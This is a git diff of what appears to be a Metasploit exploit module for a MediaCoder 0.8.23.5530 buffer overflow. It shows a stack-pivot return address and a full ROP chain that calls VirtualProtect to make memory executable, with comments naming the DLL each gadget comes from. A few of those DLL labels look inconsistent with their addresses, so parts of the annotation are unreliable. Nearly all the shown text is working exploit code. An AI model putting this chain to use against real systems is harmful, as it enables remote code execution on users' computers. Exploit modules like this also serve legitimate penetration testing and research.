@@ -26,7 +26,7 @@ def initialize(info = {})
26
26
'Author' =>
27
27
[
28
28
'metacom' , # Vulnerability discovery and PoC
29
- 'modpr0be <modpr0be[at]spentera.com>' # Metasploit module
29
+ 'modpr0be <modpr0be[at]spentera.com>' , # Metasploit module
30
30
'otoy <otoy[at]spentera.com>' # Metasploit module
31
31
] ,
32
32
'References' =>
@@ -50,7 +50,7 @@ def initialize(info = {})
50
50
[
51
51
[ 'MediaCoder 0.8.23.5530 / Windows XP SP3 / Windows 7 SP1' ,
52
52
{
53
- 'Ret' => 0x6afd4435 , # stack pivot (add esp,7ac;pop pop pop pop ret)
53
+ 'Ret' => 0x6afd4435 , # stack pivot (add esp,7ac;pop pop pop pop ret from postproc-52.dll )
54
54
'Offset' => 849 ,
55
55
'Max' => 5000
56
56
}
@@ -80,33 +80,33 @@ def exploit
80
80
rop_gadgets =
81
81
[
82
82
nops ( true , 35 ) , # ROP NOP
83
- 0x100482ff , # POP EAX # POP EBP # RETN
83
+ 0x100482ff , # POP EAX # POP EBP # RETN [jpeg.dll]
84
84
0xffffffc0 , # negate will become 0x00000040
85
85
junk ,
86
- 0x66d9d9ba , # NEG EAX # RETN
87
- 0x6ab2241d , # XCHG EAX,EDX # ADD ESP,2C # POP EBP # POP EDI # POP ESI # POP EBX # RETN
86
+ 0x66d9d9ba , # NEG EAX # RETN [avutil-52.dll]
87
+ 0x6ab2241d , # XCHG EAX,EDX # ADD ESP,2C # POP EBP # POP EDI # POP ESI # POP EBX # RETN [swscale-2.dll]
88
88
junk ( 15 ) , # reserve more junk for add esp,2c
89
- 0x1004a8ee , # POP ECX # RETN
90
- 0x6ab561b0 , # ptr to &VirtualProtect()
91
- 0x66d9feee , # MOV EAX,DWORD PTR DS:[ECX] # RETN
92
- 0x6ab19780 , # XCHG EAX,ESI # RETN
93
- 0x66d929f5 , # POP EAX # POP EBX # RETN
89
+ 0x1004cc03 , # POP ECX # RETN [jpeg.dll]
90
+ 0x6ab561b0 , # ptr to &VirtualProtect() [IAT swscale-2.dll]
91
+ 0x66d9feee , # MOV EAX,DWORD PTR DS:[ECX] # RETN [avutil-52.dll]
92
+ 0x6ab19780 , # XCHG EAX,ESI # RETN [swscale-2.dll]
93
+ 0x66d929f5 , # POP EAX # POP EBX # RETN [jpeg.dll]
94
94
0xfffffcc0 , # negate will become 0x0000033f
95
95
junk ,
96
- 0x6ab3c65a , # NEG EAX # RETN
97
- 0x1004cc03 , # POP ECX # RETN
96
+ 0x6ab3c65a , # NEG EAX # RETN [postproc-52.dll]
97
+ 0x1004cc03 , # POP ECX # RETN [jpeg.dll]
98
98
0xffffffff , #
99
- 0x660166e9 , # INC ECX # SUB AL,0EB # RETN
100
- 0x66d8ae48 , # XCHG ECX,EBX # RETN
101
- 0x1005f6e4 , # ADD EBX,EAX # OR EAX,3000000 # RETN
102
- 0x6ab3d688 , # POP ECX # RETN
103
- 0x6ab4ead0 , # Writable address
104
- 0x100444e3 , # POP EDI # RETN
105
- nops ( true ) , # ROP NOP
106
- 0x10048377 , # POP EAX # POP EBP # RETN
99
+ 0x660166e9 , # INC ECX # SUB AL,0EB # RETN [libiconv-2.dll]
100
+ 0x66d8ae48 , # XCHG ECX,EBX # RETN [avutil-52.dll]
101
+ 0x1005f6e4 , # ADD EBX,EAX # OR EAX,3000000 # RETN [jpeg.dll]
102
+ 0x6ab3d688 , # POP ECX # RETN [jpeg.dll]
103
+ 0x6ab4ead0 , # Writable address [avutil-52.dll]
104
+ 0x100444e3 , # POP EDI # RETN [swscale-2.dll]
105
+ nops ( true ) , # ROP NOP [swscale-2.dll]
106
+ 0x100482ff , # POP EAX # POP EBP # RETN [jpeg.dll]
107
107
nops , # Regular NOPs
108
- 0x6ab01c06 , # PUSH ESP# RETN
109
- 0x6ab28dda , # PUSHAD # RETN
108
+ 0x6ab01c06 , # PUSH ESP# RETN [swscale-2.dll]
109
+ 0x6ab28dda , # PUSHAD # RETN [swscale-2.dll]
110
110
] . flatten . pack ( "V*" )
111
111
112
112
sploit = "http://"
0 commit comments